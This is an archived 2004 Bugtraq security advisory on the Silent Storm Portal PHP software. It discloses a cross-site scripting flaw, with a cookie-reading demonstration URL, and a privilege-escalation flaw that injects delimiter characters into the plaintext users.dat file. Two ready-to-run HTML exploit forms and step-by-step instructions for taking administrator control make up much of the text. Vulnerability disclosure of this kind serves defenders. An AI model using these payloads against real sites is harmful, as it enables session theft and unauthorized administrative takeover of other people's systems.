[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple Vulnerabilities in Silent Storm Portal
From:       R00tCr4ck <root () cyberspy ! org>
Date:       2004-09-30 11:57:54
Message-ID: 20040930115754.15459.qmail () www ! securityfocus ! com
[Download RAW message or body]



#####################################
# CHT Security Research-2004        #
# http://www.CyberSpy.Org           #
# Turkey                      	    #
#####################################

Software:
Silent Storm Portal

Web Site:
http://www.silent-storm.co.uk/ssp/

Affected Version(s):
2.1,2.2

Description:
Silent Storm Portal is a PHP based portal system.It requires PHP4 or above.no MySQL \
needed.

Multiple Vulnerabilities in Silent Storm Portal:

Cross-Site Scripting vulnerability : 

Silent Storm Portal is prone to cross-site scripting attacks. It is possible to \
construct a link containing arbitrary script code to a website running Silent Storm \
Portal . When a user browses the link, the script code will be executed on the user \
in the context of the site using the Portal.The impact of this issue is that the \
attacker is able to hijack a legitimate web user's session, by stealing cookie-based \
authentication credentials.

Demonstration:

http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E



Unauthorized Administrative Access Vulnerability :

Silent Storm Portal stores all account informations,usernames and passwords in the \
users.dat file.This file is a plaintext file stored in the db directory.There is a \
flaw in profile.php file which could allow normal members to gain escalated \
privileges.The issue occurs due to insufficient sanitization of user-supplied data \
that may allow escape character sequences to be injected into the users.dat \
file.Submitting an e-mail address with an evil level code via profile module will \
inject Administrator level value into the database file and will escalate the current \
level to Administrator privileges.

Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )

examples from the database file:

before exploiting:

evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>
			              Level
				   Normal User
after exploiting:

evilaccount<~>password<~>any@mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
			         Injected Level
				  Administrator

You'll get "Updated Your Profile Sucessfuly !" message after executing the \
exploit.html That's All! logout and re-login with your username/password.
click to "Admin Panel" link. ( index.php?module=../../apanel )
Now you have full Administrator privileges.

Here is another code that creates an Administrator account directly on the victim's \
portal:

---exploit2.html----
<form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:<input type="text" name="usr" size="10"><br>
Pass:<input type="password" name="pas" size="10"><br>
<input type=hidden name="ema" value="any@mail.com<~>1<~>"><br>
<input type="submit" name="reg" value="Create Admin!">
</form>
---/exploit2.html---

----------------------------
The original article can be found at: 
http://www.CyberSpy.Org
(Turkish Language)


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic